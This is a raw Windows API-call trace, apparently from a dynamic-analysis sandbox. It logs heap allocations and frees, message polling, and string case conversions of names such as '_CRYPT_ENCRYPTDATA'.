[0175.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6cc4) returned 0xa7f018 [0175.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0175.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0175.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0175.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0175.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.871] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0175.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0175.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0175.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0175.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0175.871] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0175.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0175.872] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0175.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0175.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0175.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0175.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0175.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0175.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0175.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0175.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6cc4) returned 0xa7f018 [0175.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2698 [0175.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0175.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0175.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0175.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2828 [0175.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0175.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0175.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0175.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2858 [0175.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0175.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0175.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0175.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5b8 [0175.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0175.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0175.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0175.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0175.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0175.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6cc4) returned 0xa8c9b8 [0175.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0175.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0175.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0175.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0175.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0175.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0175.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0175.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0175.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0175.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0175.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0175.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0175.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0175.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0175.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0175.874] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0175.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0175.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0175.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0175.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0175.874] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0175.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0175.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0175.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0175.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0175.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0175.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0175.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0175.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0175.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0175.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0175.874] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0175.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0175.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0175.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0175.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2798 [0175.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0175.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0175.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0175.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0175.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0175.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0175.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0175.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0175.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0175.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0175.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0175.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0175.875] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0175.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0175.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0175.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0175.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0175.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0175.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0175.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0175.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0175.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0175.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0175.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0175.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0175.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0175.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0175.876] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0175.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0175.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0175.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0175.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0175.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0175.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0175.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0175.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0175.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0175.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0175.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0175.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0175.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0175.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0175.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0175.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0175.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0175.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0175.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0175.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0175.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0175.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0175.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0175.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0175.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.877] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0175.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0175.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0175.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0175.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0175.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0175.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0175.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0175.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0175.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0175.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0175.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0175.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0175.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0175.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0175.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0175.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0175.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0175.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0175.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0175.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0175.878] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0175.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0175.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0175.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0175.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0175.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0175.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0175.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0175.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0175.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0175.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0175.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0175.878] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0175.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0175.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3f0 [0175.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0175.879] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0175.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0175.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0175.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0175.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0175.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0175.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0175.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0175.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0175.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0175.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0175.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0175.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0175.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0175.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0175.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0175.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0175.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0175.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0175.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0175.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0175.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0175.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0175.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0175.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0175.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0175.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0175.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0175.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0175.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0175.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0175.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0175.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0175.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0175.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0175.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0175.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0175.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0175.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0175.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0175.881] 